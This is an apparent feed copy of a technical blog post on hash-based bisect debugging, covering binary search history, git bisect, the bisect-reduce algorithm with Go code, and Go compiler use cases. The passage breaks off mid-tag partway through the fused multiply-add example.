research!rsc tag:research.swtch.com,2012:research.swtch.com 2024-07-18T10:19:53-04:00 Russ Cox https://swtch.com/~rsc rsc@swtch.com Hash-Based Bisect Debugging in Compilers and Runtimes tag:research.swtch.com,2012:research.swtch.com/bisect 2024-07-18T10:18:53-04:00 2024-07-18T10:20:53-04:00 Binary search over program code or execution to find why a new library or compiler causes a failure. <style> blockquote { padding-left: 0.5em; border-left-style: solid; border-left-width: 4px; border-left-color: #ccf; } </style> <a class=anchor href="#setting_the_stage"><h2 id="setting_the_stage">Setting the Stage</h2></a> <p> Does this sound familar? You make a change to a library to optimize its performance or clean up technical debt or fix a bug, only to get a bug report: some very large, incomprehensibly opaque test is now failing. Or you add a new compiler optimization with a similar result. Now you have a major debugging job in an unfamiliar code base. <p> What if I told you that a magic wand exists that can pinpoint the relevant line of code or call stack in that unfamiliar code base? It exists. It is a real tool, and I’m going to show it to you. This description might seem a bit over the top, but every time I use this tool, it really does feel like magic. Not just any magic either, but the best kind of magic: delightful to watch even when you know exactly how it works. <a class=anchor href="#binary_search_and_bisecting_data"><h2 id="binary_search_and_bisecting_data">Binary Search and Bisecting Data</h2></a> <p> Before we get to the new trick, let’s take a look at some simpler, older tricks. Every good magician starts with mastery of the basic techniques. In our case, that technique is binary search. Most presentations of binary search talk about finding an item in a sorted list, but there are far more interesting uses. Here is an example I wrote long ago for Go’s <a href="https://go.dev/pkg/sort/#Search"><code>sort.Search</code></a> documentation: <pre>func GuessingGame() { var s string fmt.Printf("Pick an integer from 0 to 100.\n") answer := sort.Search(100, func(i int) bool { fmt.Printf("Is your number &lt;= %d? ", i) fmt.Scanf("%s", &amp;s) return s != "" &amp;&amp; s[0] == 'y' }) fmt.Printf("Your number is %d.\n", answer) } </pre> <p> If we run this code, it plays a guessing game with us: <pre>% go run guess.go Pick an integer from 0 to 100. Is your number &lt;= 50? y Is your number &lt;= 25? n Is your number &lt;= 38? y Is your number &lt;= 32? y Is your number &lt;= 29? n Is your number &lt;= 31? n Your number is 32. % </pre> <p> The same guessing game can be applied to debugging. In his <i>Programming Pearls</i> column titled “Aha! Algorithms” in <i>Communications of the ACM</i> (September 1983), Jon Bentley called binary search “a solution that looks for problems.” Here’s one of his examples:<blockquote> <p> Roy Weil applied the technique [binary search] in cleaning a deck of about a thousand punched cards that contained a single bad card. Unfortunately the bad card wasn’t known by sight; it could only be identified by running some subset of the cards through a program and seeing a wildly erroneous answer—this process took several minutes. His predecessors at the task tried to solve it by running a few cards at a time through the program, and were making steady (but slow) progress toward a solution. How did Weil find the culprit in just ten runs of the program?</blockquote> <p> Obviously, Weil played the guessing game using binary search. Is the bad card in the first 500? Yes. The first 250? No. And so on. This is the earliest published description of debugging by binary search that I have been able to find. In this case, it was for debugging data. <a class=anchor href="#bisecting_version_history"><h2 id="bisecting_version_history">Bisecting Version History</h2></a> <p> We can apply binary search to a program’s version history instead of data. Every time we notice a new bug in an old program, we play the guessing game “when did this program last work?” <ul> <li> Did it work 50 days ago? Yes. <li> Did it work 25 days ago? No. <li> Did it work 38 days ago? Yes.</ul> <p> And so on, until we find that the program last worked correctly 32 days ago, meaning the bug was introduced 31 days ago. <p> Debugging through time with binary search is a very old trick, independently discovered many times by many people. For example, we could play the guessing game using commands like <code>cvs checkout -D '31 days ago'</code> or Plan 9’s <a href="https://9fans.github.io/plan9port/man/man1/yesterday.html">more musical</a> <code>yesterday -n 31</code>. To some programmers, the techniques of using binary search to debug data or debug through time seem “<a href="https://groups.google.com/g/comp.compilers/c/vGh4s3HBQ-s/m/qmrVKmF5AgAJ">so basic that there is no need to write them down</a>.” But writing a trick down is the first step to making sure everyone can do it: magic tricks can be basic but not obvious. In software, writing a trick down is also the first step to automating it and building good tools. <p> In the late-1990s, the idea of binary search over version history was <a href="https://groups.google.com/g/comp.compilers/c/vGh4s3HBQ-s/m/Chvpu7vTAgAJ">written down at least twice</a>. Brian Ness and Viet Ngo published “<a href="https://ieeexplore.ieee.org/abstract/document/625082">Regression containment through source change isolation</a>” at COMPSAC ’97 (August 1997) describing a system built at Cray Research that they used to deliver much more frequent non-regressing compiler releases. Independently, Larry McVoy published a file “<a href="https://elixir.bootlin.com/linux/1.3.73/source/Documentation/BUG-HUNTING">Documentation/BUG-HUNTING</a>” in the Linux 1.3.73 release (March 1996). He captured how magical it feels that the trick works even if you have no particular expertise in the code being tested:<blockquote> <p> This is how to track down a bug if you know nothing about kernel hacking. It’s a brute force approach but it works pretty well. <br> <br> You need: <ul> <li> A reproducible bug - it has to happen predictably (sorry) <li> All the kernel tar files from a revision that worked to the revision that doesn’t</ul> <p> You will then do: <ul> <li> Rebuild a revision that you believe works, install, and verify that. <li> Do a binary search over the kernels to figure out which one introduced the bug. I.e., suppose 1.3.28 didn’t have the bug, but you know that 1.3.69 does. Pick a kernel in the middle and build that, like 1.3.50. Build &amp; test; if it works, pick the mid point between .50 and .69, else the mid point between .28 and .50. <li> You’ll narrow it down to the kernel that introduced the bug. You can probably do better than this but it gets tricky.</ul> <p> . . . <br> <br> My apologies to Linus and the other kernel hackers for describing this brute force approach, it’s hardly what a kernel hacker would do. However, it does work and it lets non-hackers help bug fix. And it is cool because Linux snapshots will let you do this - something that you can’t do with vender supplied releases.</blockquote> <p> Later, Larry McVoy created Bitkeeper, which Linux used as its first source control system. Bitkeeper provided a way to print the longest straight line of changes through the directed acyclic graph of commits, providing a more fine-grained timeline for binary search. When Linus Torvalds created Git, he carried that idea forward as <a href="https://github.com/git/git/commit/8b3a1e056f2107deedfdada86046971c9ad7bb87"><code>git rev-list --bisect</code></a>, which enabled the same kind of manual binary search. A few days after adding it, he <a href="https://groups.google.com/g/fa.linux.kernel/c/N4CqlNCvFCY/m/ItQoFhVZyJgJ">explained how to use it</a> on the Linux kernel mailing list:<blockquote> <p> Hmm.. Since you seem to be a git user, maybe you could try the git "bisect" thing to help narrow down exactly where this happened (and help test that thing too ;). <br> <br> You can basically use git to find the half-way point between a set of "known good" points and a "known bad" point ("bisecting" the set of commits), and doing just a few of those should give us a much better view of where things started going wrong. <br> <br> For example, since you know that 2.6.12-rc3 is good, and 2.6.12 is bad, you’d do <br> <br> git-rev-list --bisect v2.6.12 ^v2.6.12-rc3 <br> <br> where the "v2.6.12 ^v2.6.12-rc3" thing basically means "everything in v2.6.12 but _not_ in v2.6.12-rc3" (that’s what the ^ marks), and the "--bisect" flag just asks git-rev-list to list the middle-most commit, rather than all the commits in between those kernel versions.</blockquote> <p> This response started a <a href="https://groups.google.com/g/fa.linux.kernel/c/cp6abJnEN5U/m/5Z5s14LkzR4J">separate discussion</a> about making the process easier, which led eventually to the <a href="https://git-scm.com/docs/git-bisect"><code>git bisect</code></a> tool that exists today. <p> Here’s an example. We tried updating to a newer version of Go and found that a test fails. We can use <code>git bisect</code> to pinpoint the specific commit that caused the failure: <p> <pre>% git bisect start master go1.21.0 Previous HEAD position was 3b8b550a35 doc: document run.. Switched to branch 'master' Your branch is ahead of 'origin/master' by 5 commits. Bisecting: a merge base must be tested [2639a17f146cc7df0778298c6039156d7ca68202] doc: run rel... % git bisect run sh -c ' git clean -df cd src ./make.bash || exit 125 cd $HOME/src/rsc.io/tmp/timertest/retry go list || exit 0 go test -count=5 ' </pre> <p> It takes some care to write a correct <code>git bisect</code> invocation, but once you get it right, you can walk away while <code>git bisect</code> works its magic. In this case, the script we pass to <code>git bisect run</code> cleans out any stale files and then builds the Go toolchain (<code>./make.bash</code>). If that step fails, it exits with code 125, a special inconclusive answer for <code>git bisect</code>: something else is wrong with this commit and we can’t say whether or not the bug we’re looking for is present. Otherwise it changes into the directory of the failing test. If <code>go list</code> fails, which happens if the bisect uses a version of Go that’s too old, the script exits successfully, indicating that the bug is not present. Otherwise the script runs <code>go test</code> and exits with the status from that command. The <code>-count=5</code> is there because this is a flaky failure that does not always happen: running five times is enough to make sure we observe the bug if it is present. <p> When we run this command, <code>git bisect</code> prints a lot of output, along with the output of our test script, to make sure we can see the progress: <pre>% git bisect run ... ... go: download go1.23 for darwin/arm64: toolchain not available Bisecting: 1360 revisions left to test after this (roughly 10 steps) [752379113b7c3e2170f790ec8b26d590defc71d1] runtime/race: update race syso for PPC64LE ... go: download go1.23 for darwin/arm64: toolchain not available Bisecting: 680 revisions left to test after this (roughly 9 steps) [ff8a2c0ad982ed96aeac42f0c825219752e5d2f6] go/types: generate mono.go from types2 source ... ok rsc.io/tmp/timertest/retry 10.142s Bisecting: 340 revisions left to test after this (roughly 8 steps) [97f1b76b4ba3072ab50d0d248fdce56e73b45baf] runtime: optimize timers.cleanHead ... FAIL rsc.io/tmp/timertest/retry 22.136s Bisecting: 169 revisions left to test after this (roughly 7 steps) [80157f4cff014abb418004c0892f4fe48ee8db2e] io: close PipeReader in test ... ok rsc.io/tmp/timertest/retry 10.145s Bisecting: 84 revisions left to test after this (roughly 6 steps) [8f7df2256e271c8d8d170791c6cd90ba9cc69f5e] internal/asan: match runtime.asan{read,write} len parameter type ... FAIL rsc.io/tmp/timertest/retry 20.148s Bisecting: 42 revisions left to test after this (roughly 5 steps) [c9ed561db438ba413ba8cfac0c292a615bda45a8] debug/elf: avoid using binary.Read() in NewFile() ... FAIL rsc.io/tmp/timertest/retry 14.146s Bisecting: 20 revisions left to test after this (roughly 4 steps) [2965dc989530e1f52d80408503be24ad2582871b] runtime: fix lost sleep causing TestZeroTimer flakes ... FAIL rsc.io/tmp/timertest/retry 18.152s Bisecting: 10 revisions left to test after this (roughly 3 steps) [b2e9221089f37400f309637b205f21af7dcb063b] runtime: fix another lock ordering problem ... ok rsc.io/tmp/timertest/retry 10.142s Bisecting: 5 revisions left to test after this (roughly 3 steps) [418e6d559e80e9d53e4a4c94656e8fb4bf72b343] os,internal/godebugs: add missing IncNonDefault calls ... ok rsc.io/tmp/timertest/retry 10.163s Bisecting: 2 revisions left to test after this (roughly 2 steps) [6133c1e4e202af2b2a6d4873d5a28ea3438e5554] internal/trace/v2: support old trace format ... FAIL rsc.io/tmp/timertest/retry 22.164s Bisecting: 0 revisions left to test after this (roughly 1 step) [508bb17edd04479622fad263cd702deac1c49157] time: garbage collect unstopped Tickers and Timers ... FAIL rsc.io/tmp/timertest/retry 16.159s Bisecting: 0 revisions left to test after this (roughly 0 steps) [74a0e3160d969fac27a65cd79a76214f6d1abbf5] time: clean up benchmarks ... ok rsc.io/tmp/timertest/retry 10.147s 508bb17edd04479622fad263cd702deac1c49157 is the first bad commit commit 508bb17edd04479622fad263cd702deac1c49157 Author: Russ Cox &lt;rsc@golang.org&gt; AuthorDate: Wed Feb 14 20:36:47 2024 -0500 Commit: Russ Cox &lt;rsc@golang.org&gt; CommitDate: Wed Mar 13 21:36:04 2024 +0000 time: garbage collect unstopped Tickers and Timers ... This CL adds an undocumented GODEBUG asynctimerchan=1 that will disable the change. The documentation happens in the CL 568341. ... bisect found first bad commit % </pre> <p> This bug appears to be caused by my new garbage-collection-friendly timer implementation that will be in Go 1.23. <i>Abracadabra!</i> <a class=anchor href="#new_trick"><h2 id="new_trick">A New Trick: Bisecting Program Locations</h2></a> <p> The culprit commit that <code>git bisect</code> identified is a significant change to the timer implementation. I anticipated that it might cause subtle test failures, so I included a <a href="https://go.dev/doc/godebug">GODEBUG setting</a> to toggle between the old implementation and the new one. Sure enough, toggling it makes the bug disappear: <pre>% GODEBUG=asynctimerchan=1 go test -count=5 # old PASS ok rsc.io/tmp/timertest/retry 10.117s % GODEBUG=asynctimerchan=0 go test -count=5 # new --- FAIL: TestDo (4.00s) ... --- FAIL: TestDo (6.00s) ... --- FAIL: TestDo (4.00s) ... FAIL rsc.io/tmp/timertest/retry 18.133s % </pre> <p> Knowing which commit caused a bug, along with minimal information about the failure, is often enough to help identify the mistake. But what if it’s not? What if the test is large and complicated and entirely code you’ve never seen before, and it fails in some inscrutable way that doesn’t seem to have anything to do with your change? When you work on compilers or low-level libraries, this happens quite often. For that, we have a new magic trick: bisecting program locations. <p> That is, we can run binary search on a different axis: over the <i>program’s code</i>, not its version history. We’ve implemented this search in a new tool unimaginatively named <code>bisect</code>. When applied to library function behavior like the timer change, <code>bisect</code> can search over all stack traces leading to the new code, enabling the new code for some stacks and disabling it for others. By repeated execution, it can narrow the failure down to enabling the code only for one specific stack: <pre>% go install golang.org/x/tools/cmd/bisect@latest % bisect -godebug asynctimerchan=1 go test -count=5 ... bisect: FOUND failing change set --- change set #1 (disabling changes causes failure) internal/godebug.(*Setting).Value() /Users/rsc/go/src/internal/godebug/godebug.go:165 time.syncTimer() /Users/rsc/go/src/time/sleep.go:25 time.NewTimer() /Users/rsc/go/src/time/sleep.go:145 time.After() /Users/rsc/go/src/time/sleep.go:203 rsc.io/tmp/timertest/retry.Do() /Users/rsc/src/rsc.io/tmp/timertest/retry/retry.go:37 rsc.io/tmp/timertest/retry.TestDo() /Users/rsc/src/rsc.io/tmp/timertest/retry/retry_test.go:63 </pre> <p> Here the <code>bisect</code> tool is reporting that disabling <code>asynctimerchan=1</code> (that is, enabling the new implementation) only for this one call stack suffices to provoke the test failure. <p> One of the hardest things about debugging is running a program backward: there’s a data structure with a bad value, or the control flow has zigged instead of zagged, and it’s very difficult to understand how it could have gotten into that state. In contrast, this <code>bisect</code> tool is showing the stack at the moment just <i>before</i> things go wrong: the stack identifies the critical decision point that determines whether the test passes or fails. In contrast to puzzling backward, it is usually easy to look forward in the program execution to understand why this specific decision would matter. Also, in an enormous code base, the bisection has identified the specific few lines where we should start debugging. We can read the code responsible for that specific sequence of calls and look into why the new timers would change the code’s behavior. <p> When you are working on a compiler or runtime and cause a test failure in an enormous, unfamiliar code base, and then this <code>bisect</code> tool narrows down the cause to a few specific lines of code, it is truly a magical experience. <p> The rest of this post explains the inner workings of this <code>bisect</code> tool, which Keith Randall, David Chase, and I developed and refined over the past decade of work on Go. Other people and projects have realized the idea of bisecting program locations too: I am not claiming that we were the first to discover it. However, I think we have developed the approach further and systematized it more than others. This post documents what we’ve learned, so that others can build on our efforts rather than rediscover them. <a class=anchor href="#example"><h2 id="example">Example: Bisecting Function Optimization</h2></a> <p> Let’s start with a simple example and work back up to stack traces. Suppose we are working on a compiler and know that a test program fails only when compiled with optimizations enabled. We could make a list of all the functions in the program and then try disabling optimization of functions one at a time until we find a minimal set of functions (probably just one) whose optimization triggers the bug. Unsurprisingly, we can speed up that process using binary search: <ol> <li> Change the compiler to print a list of every function it considers for optimization. <li> Change the compiler to accept a list of functions where optimization is allowed. Passing it an empty list (optimize no functions) should make the test pass, while passing the complete list (optimize all functions) should make the test fail. <li> Use binary search to determine the shortest list prefix that can be passed to the compiler to make the test fail. The last function in that list prefix is one that must be optimized for the test to fail (but perhaps not the only one). <li> Forcing that function to always be optimized, we can repeat the process to find any other functions that must also be optimized to provoke the bug.</ol> <p> For example, suppose there are ten functions in the program and we run these three binary search trials: <p> <img name="hashbisect0func" class="center pad" width=197 height=238 src="hashbisect0func.png" srcset="hashbisect0func.png 1x, hashbisect0func@1.5x.png 1.5x, hashbisect0func@2x.png 2x, hashbisect0func@3x.png 3x, hashbisect0func@4x.png 4x"> <p> When we optimize the first 5 functions, the test passes. 7? fail. 6? still pass. This tells us that the seventh function, <code>sin</code>, is one function that must be optimized to provoke the failure. More precisely, with <code>sin</code> optimized, we know that no functions later in the list need to be optimized, but we don’t know whether any of functions earlier in the list must also be optimized. To check the earlier locations, we can run another binary search over the other remaining six list entries, always adding <code>sin</code> as well: <p> <img name="hashbisect0funcstep2" class="center pad" width=218 height=180 src="hashbisect0funcstep2.png" srcset="hashbisect0funcstep2.png 1x, hashbisect0funcstep2@1.5x.png 1.5x, hashbisect0funcstep2@2x.png 2x, hashbisect0funcstep2@3x.png 3x, hashbisect0funcstep2@4x.png 4x"> <p> This time, optimizing the first two (plus the hard-wired <code>sin</code>) fails, but optimizing the first one passes, indicating that <code>cos</code> must also be optimized. Then we have just one suspect location left: <code>add</code>. A binary search over that one-entry list (plus the two hard-wired <code>cos</code> and <code>sin</code>) shows that <code>add</code> can be left off the list without losing the failure. <p> Now we know the answer: one locally minimal set of functions to optimize to cause the test failure is <code>cos</code> and <code>sin</code>. By locally minimal, I mean that removing any function from the set makes the test failure disappear: optimizing <code>cos</code> or <code>sin</code> by itself is not enough. However, the set may still not be globally minimal: perhaps optimizing only <code>tan</code> would cause a different failure (or not). <p> It might be tempting to run the search more like a traditional binary search, cutting the list being searched in half at each step. That is, after confirming that the program passes when optimizing the first half, we might consider discarding that half of the list and continuing the binary search on the other half. Applied to our example, that algorithm would run like this: <p> <img name="hashbisect0funcbad" class="center pad" width=290 height=237 src="hashbisect0funcbad.png" srcset="hashbisect0funcbad.png 1x, hashbisect0funcbad@1.5x.png 1.5x, hashbisect0funcbad@2x.png 2x, hashbisect0funcbad@3x.png 3x, hashbisect0funcbad@4x.png 4x"> <p> The first trial passing would suggest the incorrect optimization is in the second half of the list, so we discard the first half. But now <code>cos</code> is never optimized (it just got discarded), so all future trials pass too, leading to a contradiction: we lost track of the way to make the program fail. The problem is that discarding part of the list is only justified if we know that part doesn’t matter. That’s only true if the bug is caused by optimizing a single function, which may be likely but is not guaranteed. If the bug only manifests when optimizing multiple functions at once, discarding half the list discards the failure. That’s why the binary search must in general be over list prefix lengths, not list subsections. <a class=anchor href="#bisect-reduce"><h2 id="bisect-reduce">Bisect-Reduce</h2></a> <p> The “repeated binary search” algorithm we just looked at does work, but the need for the repetition suggests that binary search may not be the right core algorithm. Here is a more direct algorithm, which I’ll call the “bisect-reduce” algorithm, since it is a bisection-based reduction. <p> For simplicity, let’s assume we have a global function <code>buggy</code> that reports whether the bug is triggered when our change is enabled at the given list of locations: <pre>// buggy reports whether the bug is triggered // by enabling the change at the listed locations. func buggy(locations []string) bool </pre> <p> <code>BisectReduce</code> takes a single input list <code>targets</code> for which <code>buggy(targets)</code> is true and returns a locally minimal subset <code>x</code> for which <code>buggy(x)</code> remains true. It invokes a more generalized helper <code>bisect</code>, which takes an additional argument: a <code>forced</code> list of locations to keep enabled during the reduction. <pre>// BisectReduce returns a locally minimal subset x of targets // where buggy(x) is true, assuming that buggy(targets) is true. func BisectReduce(targets []string) []string { return bisect(targets, []string{}) } // bisect returns a locally minimal subset x of targets // where buggy(x+forced) is true, assuming that // buggy(targets+forced) is true. // // Precondition: buggy(targets+forced) = true. // // Postcondition: buggy(result+forced) = true, // and buggy(x+forced) = false for any x ⊂ result. func bisect(targets []string, forced []string) []string { if len(targets) == 0 || buggy(forced) { // Targets are not needed at all. return []string{} } if len(targets) == 1 { // Reduced list to a single required entry. return []string{targets[0]} } // Split targets in half and reduce each side separately. m := len(targets)/2 left, right := targets[:m], targets[m:] leftReduced := bisect(left, slices.Concat(right, forced)) rightReduced := bisect(right, slices.Concat(leftReduced, forced)) return slices.Concat(leftReduced, rightReduced) } </pre> <p> Like any good divide-and-conquer algorithm, a few lines do quite a lot: <ul> <li> <p> If the target list has been reduced to nothing, or if <code>buggy(forced)</code> (without any targets) is true, then we can return an empty list. Otherwise we know something from targets is needed. <li> <p> If the target list is a single entry, that entry is what’s needed: we can return a single-element list. <li> <p> Otherwise, the recursive case: split the target list in half and reduce each side separately. Note that it is important to force <code>leftReduced</code> (not <code>left</code>) while reducing <code>right</code>.</ul> <p> Applied to the function optimization example, <code>BisectReduce</code> would end up at a call to <pre>bisect([add cos div exp mod mul sin sqr sub tan], []) </pre> <p> which would split the targets list into <pre>left = [add cos div exp mod] right = [mul sin sqr sub tan] </pre> <p> The recursive calls compute: <pre>bisect([add cos div exp mod], [mul sin sqr sub tan]) = [cos] bisect([mul sin sqr sub tan], [cos]) = [sin] </pre> <p> Then the <code>return</code> puts the two halves together: <code>[cos sin]</code>. <p> The version of <code>BisectReduce</code> we have been considering is the shortest one I know; let’s call it the “short algorithm”. A longer version handles the “easy” case of the bug being contained in one half before the “hard” one of needing parts of both halves. Let’s call it the “easy/hard algorithm”: <pre>// BisectReduce returns a locally minimal subset x of targets // where buggy(x) is true, assuming that buggy(targets) is true. func BisectReduce(targets []string) []string { if len(targets) == 0 || buggy(nil) { return nil } return bisect(targets, []string{}) } // bisect returns a locally minimal subset x of targets // where buggy(x+forced) is true, assuming that // buggy(targets+forced) is true. // // Precondition: buggy(targets+forced) = true, // and buggy(forced) = false. // // Postcondition: buggy(result+forced) = true, // and buggy(x+forced) = false for any x ⊂ result. // Also, if there are any valid single-element results, // then bisect returns one of them. func bisect(targets []string, forced []string) []string { if len(targets) == 1 { // Reduced list to a single required entry. return []string{targets[0]} } // Split targets in half. m := len(targets)/2 left, right := targets[:m], targets[m:] // If either half is sufficient by itself, focus there. if buggy(slices.Concat(left, forced)) { return bisect(left, forced) } if buggy(slices.Concat(right, forced)) { return bisect(right, forced) } // Otherwise need parts of both halves. leftReduced := bisect(left, slices.Concat(right, forced)) rightReduced := bisect(right, slices.Concat(leftReduced, forced)) return slices.Concat(leftReduced, rightReduced) } </pre> <p> The easy/hard algorithm has two benefits and one drawback compared to the short algorithm. <p> One benefit is that the easy/hard algorithm more directly maps to our intuitions about what bisecting should do: try one side, try the other, fall back to some combination of both sides. In contrast, the short algorithm always relies on the general case and is harder to understand. <p> Another benefit of the easy/hard algorithm is that it guarantees to find a single-culprit answer when one exists. Since most bugs can be reduced to a single culprit, guaranteeing to find one when one exists makes for easier debugging sessions. Supposing that optimizing <code>tan</code> would have triggered the test failure, the easy/hard algorithm would try <pre>buggy([add cos div exp mod]) = false // left buggy([mul sin sqr sub tan]) = true // right </pre> <p> and then would discard the left side, focusing on the right side and eventually finding <code>[tan]</code>, instead of <code>[sin cos]</code>. <p> The drawback is that because the easy/hard algorithm doesn’t often rely on the general case, the general case needs more careful testing and is easier to get wrong without noticing. For example, Andreas Zeller’s 1999 paper “<a href="https://dl.acm.org/doi/10.1145/318774.318946">Yesterday, my program worked. Today, it does not. Why?</a>” gives what should be the easy/hard version of the bisect-reduce algorithm as a way to bisect over independent program changes, except that the algorithm has a bug: in the “hard” case, the <code>right</code> bisection forces <code>left</code> instead of <code>leftReduced</code>. The result is that if there are two culprit pairs crossing the <code>left</code>/<code>right</code> boundary, the reductions can choose one culprit from each pair instead of a matched pair. Simple test cases are all handled by the easy case, masking the bug. In contrast, if we insert the same bug into the general case of the short algorithm, very simple test cases fail. <p> Real implementations are better served by the easy/hard algorithm, but they must take care to implement it correctly. <a class=anchor href="#list-based_bisect-reduce"><h2 id="list-based_bisect-reduce">List-Based Bisect-Reduce</h2></a> <p> Having established the algorithm, let’s now turn to the details of hooking it up to a compiler. Exactly how do we obtain the list of source locations, and how do we feed it back into the compiler? <p> The most direct answer is to implement one debug mode that prints the full list of locations for the optimization in question and another debug mode that accepts a list indicating where the optimization is permitted. <a href="https://bernsteinbear.com/blog/cinder-jit-bisect/">Meta’s Cinder JIT for Python</a>, published in 2021, takes this approach for deciding which functions to compile with the JIT (as opposed to interpret). Its <a href="https://github.com/facebookincubator/cinder/blob/cinder/3.10/Tools/scripts/jitlist_bisect.py"><code>Tools/scripts/jitlist_bisect.py</code></a> is the earliest correct published version of the bisect-reduce algorithm that I’m aware of, using the easy/hard form. <p> The only downside to this approach is the potential size of the lists, especially since bisect debugging is critical for reducing failures in very large programs. If there is some way to reduce the amount of data that must be sent back to the compiler on each iteration, that would be helpful. In complex build systems, the function lists may be too large to pass on the command line or in an environment variable, and it may be difficult or even impossible to arrange for a new input file to be passed to every compiler invocation. An approach that can specify the target list as a short command line argument will be easier to use in practice. <a class=anchor href="#counter-based_bisect-reduce"><h2 id="counter-based_bisect-reduce">Counter-Based Bisect-Reduce</h2></a> <p> Java’s HotSpot C2 just-in-time (JIT) compiler provided a debug mechanism to control which functions to compile with the JIT, but instead of using an explicit list of functions like in Cinder, HotSpot numbered the functions as it considered them. The compiler flags <code>-XX:CIStart</code> and <code>-XX:CIStop</code> set the range of function numbers that were eligible to be compiled. Those flags are <a href="https://github.com/openjdk/jdk/blob/151ef5d4d261c9fc740d3ccd64a70d3b9ccc1ab5/src/hotspot/share/compiler/compileBroker.cpp#L1569">still present today (in debug builds)</a>, and you can find uses of them in <a href="https://bugs.java.com/bugdatabase/view_bug?bug_id=4311720">Java bug reports dating back at least to early 2000</a>. <p> There are at least two limitations to numbering functions. <p> The first limitation is minor and easily fixed: allowing only a single contiguous range enables binary search for a single culprit but not the general bisect-reduce for multiple culprits. To enable bisect-reduce, it would suffice to accept a list of integer ranges, like <code>-XX:CIAllow=1-5,7-10,12,15</code>. <p> The second limitation is more serious: it can be difficult to keep the numbering stable from run to run. Implementation strategies like compiling functions in parallel might mean considering functions in varying orders based on thread interleaving. In the context of a JIT, even threaded runtime execution might change the order that functions are considered for compilation. Twenty-five years ago, threads were rarely used and this limitation may not have been much of a problem. Today, assuming a consistent function numbering is a show-stopper. <a class=anchor href="#hash-based_bisect-reduce"><h2 id="hash-based_bisect-reduce">Hash-Based Bisect-Reduce</h2></a> <p> A different way to keep the location list implicit is to hash each location to a (random-looking) integer and then use bit suffixes to identify sets of locations. The hash computation does not depend on the sequence in which the source locations are encountered, making hashing compatible with parallel compilation, thread interleaving, and so on. The hashes effectively arrange the functions into a binary tree: <p> <img name="hashbisect1" class="center pad" width=817 height=411 src="hashbisect1.png" srcset="hashbisect1.png 1x, hashbisect1@1.5x.png 1.5x, hashbisect1@2x.png 2x, hashbisect1@3x.png 3x"> <p> Looking for a single culprit is a basic walk down the tree. Even better, the general bisect-reduce algorithm is easily adapted to hash suffix patterns. First we have to adjust the definition of <code>buggy</code>: we need it to tell us the number of matches for the suffix we are considering, so we know whether we can stop reducing the case: <pre>// buggy reports whether the bug is triggered // by enabling the change at the locations with // hashes ending in suffix or any of the extra suffixes. // It also returns the number of locations found that // end in suffix (only suffix, ignoring extra). func buggy(suffix string, extra []string) (fail bool, n int) </pre> <p> Now we can translate the easy/hard algorithm more or less directly: <pre>// BisectReduce returns a locally minimal list of hash suffixes, // each of which uniquely identifies a single location hash, // such that buggy(list) is true. func BisectReduce() []string { if fail, _ := buggy("none", nil); fail { return nil } return bisect("", []string{}) } // bisect returns a locally minimal list of hash suffixes, // each of which uniquely identifies a single location hash, // and all of which end in suffix, // such that buggy(result+forced) = true. // // Precondition: buggy(suffix, forced) = true, _. // and buggy("none", forced) = false, 0. // // Postcondition: buggy("none", result+forced) = true, 0; // each suffix in result matches a single location hash; // and buggy("none", x+forced) = false for any x ⊂ result. // Also, if there are any valid single-element results, // then bisect returns one of them. func bisect(suffix string, forced []string) []string { if _, n := buggy(suffix, forced); n == 1 { // Suffix identifies a single location. return []string{suffix} } // If either of 0suffix or 1suffix is sufficient // by itself, focus there. if fail, _ := buggy("0"+suffix, forced); fail { return bisect("0"+suffix, forced) } if fail, _ := buggy("1"+suffix, forced); fail { return bisect("1"+suffix, forced) } // Matches from both extensions are needed. // Otherwise need parts of both halves. leftReduced := bisect("0"+suffix, slices.Concat([]string{"1"+suffix"}, forced)) rightReduced := bisect("1"+suffix, slices.Concat(leftReduced, forced)) return slices.Concat(leftReduce, rightReduce) } </pre> <p> Careful readers might note that in the easy cases, the recursive call to <code>bisect</code> starts by repeating the same call to <code>buggy</code> that the caller did, this time to count the number of matches for the suffix in question. An efficient implementation could pass the result of that run to the recursive call, avoiding redundant trials. <p> In this version, <code>bisect</code> does not guarantee to cut the search space in half at each level of the recursion. Instead, the randomness of the hashes means that it cuts the search space roughly in half on average. That’s still enough for logarithmic behavior when there are just a few culprits. The algorithm would also work correctly if the suffixes were applied to match a consistent sequential numbering instead of hashes; the only problem is obtaining the numbering. <p> The hash suffixes are about as short as the function number ranges and easily passed on the command line. For example, a hypothetical Java compiler could use <code>-XX:CIAllowHash=000,10,111</code>. <a class=anchor href="#use_case"><h2 id="use_case">Use Case: Function Selection</h2></a> <p> The earliest use of hash-based bisect-reduce in Go was for selecting functions, as in the example we’ve been considering. In 2015, Keith Randall was working on a new SSA backend for the Go compiler. The old and new backends coexisted, and the compiler could use either for any given function in the program being compiled. Keith introduced an <a href="https://go.googlesource.com/go/+/e3869a6b65bb0f95dac7eca3d86055160b12589f">environment variable GOSSAHASH</a> that specified the last few binary digits of the hash of function names that should use the new backend: GOSSAHASH=0110 meant “compile only those functions whose names hash to a value with last four bits 0110.” When a test was failing with the new backend, a person debugging the test case tried GOSSAHASH=0 and GOSSAHASH=1 and then used binary search to progressively refine the pattern, narrowing the failure down until only a single function was being compiled with the new backend. This was invaluable for approaching failures in large real-world tests (tests for libraries or production code, not for the compiler) that we had not written and did not understand. The approach assumed that the failure could always be reduced to a single culprit function. <p> It is fascinating that HotSpot, Cinder, and Go all hit upon the idea of binary search to find miscompiled functions in a compiler, and yet all three used different selection mechanisms (counters, function lists, and hashes). <a class=anchor href="#use_case"><h2 id="use_case">Use Case: SSA Rewrite Selection</h2></a> <p> In late 2016, David Chase was debugging a new optimizer rewrite rule that should have been correct but was causing mysterious test failures. He <a href="https://go-review.googlesource.com/29273">reused the same technique</a> but at finer granularity: the bit pattern now controlled which functions that rewrite rule could be used in. <p> David also wrote the <a href="https://github.com/dr2chase/gossahash/tree/e0bba144af8b1cc8325650ea8fbe3a5c946eb138">initial version of a tool, <code>gossahash</code></a>, for taking on the job of binary search. Although <code>gossahash</code> only looked for a single failure, but it was remarkably helpful. It served for many years and eventually became <code>bisect</code>. <a class=anchor href="#use_case"><h2 id="use_case">Use Case: Fused Multiply-Add</h2></a> <p> Having a tool available, instead of needing to bisect manually, made us keep finding problems we could solve. In 2022, another presented itself. We had updated the Go compiler to use floating-point fused multiply-add (FMA) instructions on a new architecture, and some tests were failing. By making the FMA rewrite conditional on a suffix of a hash that included the current file name and line number, we could apply bisect-reduce to identify the specific line in the source code where FMA instruction broke the test. <p> For example, this bisection finds that <code>b.go:7</code> is the culprit line: <p> <img name="hashbisect0" class="center pad" width=254 height=218 